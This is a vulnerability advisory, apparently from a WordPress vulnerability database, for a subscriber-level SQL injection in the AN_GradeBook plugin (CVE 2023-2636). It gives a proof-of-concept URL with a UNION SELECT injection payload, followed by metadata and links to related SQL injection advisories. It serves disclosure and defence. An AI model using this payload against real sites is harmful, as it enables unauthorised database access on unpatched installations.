AN_GradeBook <= 5.0.1 – Subscriber+ SQLi | CVE 2023-2636 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber

Proof of Concept

Access the following URL to demonstrate SQLi:

http://example.com/wp-admin/admin-ajax.php?action=course&id=-9264%20UNION%20ALL%20SELECT%20CONCAT(0x7171717071,0x5141527377414962644f774c4477524d43624b4e5a74584c594d58596f444141504e767158546162,0x717a767a71),NULL,NULL,NULL,NULL--%20-

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lukas Kinneberg

Submitter

Lukas Kinneberg

Submitter website

https://github.com/lukinneberg

Verified

Yes

WPVDB ID

6a3bfd88-1251-4d40-b26f-62950a3ce0b5

Timeline

Publicly Published

2023-06-26 (about 2 years ago)

Added

2023-06-26 (about 2 years ago)

Last Updated

2023-06-26 (about 2 years ago)

Other

Published

Title

Published

2024-03-11

Title

News Announcement Scroll < 9.1.0 - Authenticated (Contributor+) SQL Injection via Shortcode

Published

2022-02-01

Title

Conversios.io < 4.6.2 - Subscriber+ SQL Injection

Published

2024-12-24

Title

WP Data Access – App, Table, Form and Chart Builder plugin < 5.5.23 - Unauthenticated SQL Injection

Published

2025-04-25

Title

Mailing Group Listserv < 3.0.5 - Authenticated (Subscriber+) SQL Injection

Published

2021-10-18

Title

Email Log < 2.4.7 - Admin+ SQL Injection